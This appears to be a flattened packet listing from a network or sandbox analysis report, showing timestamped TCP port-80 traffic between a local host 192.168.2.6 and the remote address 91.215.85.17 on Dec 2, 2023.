                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.252799034 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.252810001 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.252821922 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.252849102 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.252860069 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.252873898 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.252873898 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.252909899 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.253035069 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.253047943 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.253068924 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.253113985 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.253118038 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.253129959 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.253142118 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.253191948 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.253192902 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.253221035 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.253232956 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.253252029 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.253262997 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.253273010 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.253283978 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.253297091 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.253303051 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.253309011 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.253319979 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.253323078 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.253331900 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.253340006 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.253344059 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.253374100 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.253376961 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.253393888 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.253396988 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.253410101 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.253422976 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.253503084 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.253540993 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.253552914 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.253554106 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.253566980 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.253598928 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.253599882 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.253628016 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.253655910 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.253696918 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.253705025 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.253709078 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.253722906 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.253735065 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.253755093 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.253758907 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.253772020 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.253783941 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.253789902 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.253834009 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.253876925 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.253890038 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.253901005 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.253926039 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.253941059 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.253942966 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.254026890 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.254039049 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.254050016 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.254062891 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.254074097 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.254085064 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.254116058 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.254120111 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.254120111 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.254128933 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.254173994 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.254203081 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.254272938 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.254296064 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.254307985 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.254318953 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.254328966 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.254358053 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.254373074 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.254378080 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.254386902 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.254398108 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.254410028 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.254422903 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.254430056 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.254435062 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.254446983 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.254451036 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.254467964 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.254488945 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.254508018 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.254549026 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.254570961 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.254582882 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.254594088 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.254617929 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.254646063 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.254669905 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.254682064 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.254717112 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.254719019 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.254731894 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.254744053 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.254776955 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.254803896 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.254808903 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.254822016 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.254833937 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.254868984 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.254889965 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.254903078 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.254914999 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.254945993 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.254952908 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.254976988 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.255023003 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.255042076 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.255053043 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.255064011 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.255104065 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.255127907 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.255198956 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.255245924 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.255245924 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.255341053 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.255352020 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.255363941 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.255376101 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.255382061 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.255387068 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.255398989 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.255402088 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.255420923 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.255446911 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.255461931 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.255475044 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.255486965 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.255497932 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.255522013 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.255538940 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.255547047 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.255558968 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.255570889 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.255584002 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.255603075 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.255608082 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.255639076 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.255703926 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.255717039 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.255728006 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.255753040 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.255783081 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.255788088 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.255801916 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.255851030 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.255861044 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.255934000 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.255947113 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.255959034 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.255970955 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.255983114 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.255996943 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.256027937 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.256040096 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.256047010 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.256052017 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.256062984 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.256074905 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.256095886 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.256097078 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.256115913 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.256143093 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.256156921 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.256218910 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.256258011 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.256267071 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.256294966 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.256319046 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.256350994 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.256386042 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.256398916 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.256433010 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.256457090 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.256469011 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.256481886 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.256493092 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.256506920 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.256516933 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.256540060 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.256548882 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.256560087 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.256561995 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.256572962 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.256583929 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.256596088 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.256606102 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.256611109 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.256629944 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.256632090 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.256643057 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.256652117 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.256675959 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.256689072 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.256699085 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.256740093 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.256774902 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.256791115 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.256803989 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.256817102 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.256829977 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.256856918 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.256867886 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.256877899 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.256903887 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.256916046 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.256951094 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.256957054 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.256957054 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.256963968 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.257009029 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.257030964 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.257072926 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.257086039 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.257097006 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.257122040 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.257127047 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.257133961 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.257155895 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.257181883 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.257184029 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.257198095 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.257250071 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.257251978 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.257263899 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.257289886 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.257302046 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.257307053 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.257316113 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.257339954 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.257360935 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.257388115 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.257400990 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.257416964 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.257471085 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.257484913 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.257489920 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.257529020 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.257570028 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.257582903 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.257595062 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.257647038 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.257667065 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.257678986 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.257690907 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.257704020 CET804972091.215.85.17192.168.2.6
